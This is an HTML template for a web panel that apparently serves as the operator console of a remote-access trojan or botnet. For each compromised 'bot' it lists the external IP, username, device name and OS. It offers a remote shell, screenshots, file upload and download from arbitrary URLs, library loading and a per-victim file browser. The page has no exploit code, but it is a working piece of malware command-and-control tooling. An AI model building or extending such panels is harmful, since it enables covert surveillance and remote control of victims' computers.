{% extends 'base.html' %}

{% block title %}
Bot {{ id }}
{% endblock %}

{% block content %}
    <!-- Page content -->
    <script>var id = "{{ id }}"; var uuid = id;</script>
    <script>$(document).ready(function() { init(); });</script>
    <div id="main" class="main">
    
        <div id="modals" class="bot">
            <div id="uploadmodal" class="modal bot">
            <!-- Modal content -->
                <div class="modal-content">
                    <span id="uploadclose" class="close">&times;</span>
                    <input type="text" class="shell" id="uploadtext" name="uploadtext" placeholder=">Path">
                </div>
            </div>
            <div id="downloadmodal" class="modal bot">
            <!-- Modal content -->
                <div class="modal-content">
                    <span id="downloadclose" class="close">&times;</span>
                    <input type="text" class="shell" id="downloadpathtext" name="downloadpath" placeholder=">Path">
                    <input type="text" class="shell" id="downloadurltext" name="downloadurl" placeholder=">URL">
                </div>
            </div>
            <div id="loadlibrarymodal" class="modal bot">
            <!-- Modal content -->
                <div class="modal-content">
                    <span id="loadlibraryclose" class="close">&times;</span>
                    <input type="text" class="shell" id="loadlibrarytext" name="loadlibrarypath" placeholder=">Path">
                </div>
            </div>
            <div id="processmodal" class="modal bot">
            <!-- Modal content -->
                <div class="modal-content">
                    <span class="close">&times;</span>
                    <p>Some text in the Modal..</p>
                </div>
            </div>
            <div id="deletemodal" class="modal bot">
            <!-- Modal content -->
                <div class="modal-content">
                    <span id="deleteclose" class="close">&times;</span>
                    <p>Some text in the Modal..</p>
                </div>
            </div>
        </div>




        <div id="bot" class="bot">
            <h1>Info</h1>
            <img class="whiteicon" src="{{url_for('static', filename='icon/refresh-line.svg') }}" onclick="refreshHandler(uuid)">
            <div class="bot botinfo">
                <p>UUID: </p>
                <p id="uuid"></p>
            </div>
            <div class="bot botinfo">
                <p>Last Seen: </p>
                <p id="lastseen"></p>
            </div>
            <div class="bot botinfo">
                <p>External IP: </p>
                <p id="external-ip"></p>
            </div>
            <div class="bot botinfo">
                <p>Operating System: </p>
                <p id="os"></p>
            </div>
            <div class="bot botinfo">
                <p>Username: </p>
                <p id="username"></p>
            </div>
            <div class="bot botinfo">
                <p>Device Name: </p>
                <p id="devicename"></p>
            </div>
            <div class="bot botinfo">
                <p>Region: </p>
                <p id="region"></p>
            </div>
            <div class="bot botinfo">
                <p>Memory Amount: </p>
                <p id="memory-amount"></p>
            </div>
            <div class="bot botinfo">
                <p>Queue: </p>
                <p id="queue"></p>
            </div>
            
            <span>
                <img class="whiteicon" id="hidenetinfo" src="{{url_for('static', filename='icon/arrow-down-s-line.svg') }}" onclick="hideNetInfo(0)">
                <p>Network: </p>
            </span>

            <div class="bot" id="netinfo" hidden>
            </div>

            <span>
                <img class="whiteicon" id="shellicon" src="{{url_for('static', filename='icon/terminal-box-line.svg') }}" onclick="hideShell(0)">
                <h1>Shell</h1>
            </span>
            <div id="shellexecouter" class="shellouter">
                <div id="shellexec" class="shell">
                </div>
                <span class="shell">
                    <input type="text" id="command" name="command" placeholder=">">
                </span>
            </div>

            <h1>Actions</h1>
            <div class="bot botaction">
                <div class="bot botaction" id="screenshot">
                    <a href="#" onclick="ss(uuid)" id="ssbutton">
                        <span>Screenshot
                            <img class="actionicon" src="{{url_for('static', filename='icon/screenshot-2-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="info">
                    <a href="#" onclick="info(uuid)" id="infobutton">
                        <span>Update Info
                            <img class="actionicon" src="{{url_for('static', filename='icon/refresh-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="upload">
                    <a href="#" onclick="upload(uuid)" id="uploadbutton">
                        <span>Upload
                            <img class="actionicon" src="{{url_for('static', filename='icon/upload-cloud-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="download">
                    <a href="#" onclick="download(uuid)" id="downloadbutton">
                        <span>Download
                            <img class="actionicon" src="{{url_for('static', filename='icon/download-cloud-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="loadlibrary">
                    <a href="#" onclick="loadlibrary(uuid)" id="loadlibrarybutton">
                        <span>Load Library
                            <img class="actionicon" src="{{url_for('static', filename='icon/book-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="clear">
                    <a href="#" onclick="clearqueue(uuid)" id="clearqueuebutton">
                        <span>Clear Queue
                            <img class="actionicon" src="{{url_for('static', filename='icon/eraser-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="files">
                    <a href="#" onclick="window.location.href = '/uploads/' + uuid;" id="filesbutton">
                        <span>Files
                            <img class="actionicon" src="{{url_for('static', filename='icon/file-line.svg') }}">
                        </span>
                    </a>
                </div>
                <div class="bot botaction" id="delete">
                    <a href="#" onclick="deleteBot(uuid)" id="deletebutton">
                        <span>Delete
                            <img class="actionicon" src="{{url_for('static', filename='icon/delete-bin-line.svg') }}">
                        </span>
                    </a>
                </div>
            </div>
    </div>
{% endblock %}